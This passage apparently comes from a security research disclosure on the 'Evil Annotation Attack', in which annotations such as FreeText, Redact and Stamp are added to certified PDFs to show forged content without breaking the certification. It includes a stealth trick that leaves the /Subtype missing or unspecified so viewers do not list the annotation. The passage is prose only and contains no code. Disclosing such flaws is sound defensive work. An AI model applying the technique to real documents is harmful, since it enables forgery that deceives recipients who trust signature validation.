The idea of the Evil Annotation Attack (EAA) is to show arbitrary content in a certified document by abusing annotations for this purpose. Since P3 certified document allow to add annotations, EAA breaks the integrity of the certification.
We determined three annotations with a danger level high capable to hide and add text and images: FreeText, Redact, and Stamp. All three can be used to stealthily modify a certified document and inject malicious content.
In addition, 11 out of 28 annotations are classified as medium since an attacker can hide content within the certified document.
The danger level of the remaining annotations is classified as low or none since such annotations are either quite limited or not allowed in certified documents.
Attacking with Annotations: EAA
According to our attacker model, the attacker possesses a validly certified document allowing the insertion of annotations. To execute the attack, the attacker modifies a certified document by including the annotation with the malicious content at a position of attacker’s choice. Then, the attacker sends the modified file to the victim who verifies the digital signature.
The victim could detect the attack if it manually opens one of the side bars or clicks on the annotation. However, none of the tested PDF applications opened the side bars automatically. Additionally, the attacker can lock an annotation to disable clicking on it.
Improving the stealthiness of EAA
To improve the attack, we elaborated techniques to prevent the annotation’s visualization, so that it does not appear in any side bar. Surprisingly, we found a generic and simple bypass that can be applied to all annotations. PDF viewers identify annotations by their specified /Subtype. This /Subtype is also used by the viewer to assign the various editing tools, such as a text editor for FreeText comments. If the value of /Subtype is either missing or set to an unspecified value, whereby both cases are not prohibited according to the specification, the PDF viewer is unable to assign the annotation. In summary, the annotation is indistinguishable from the original content.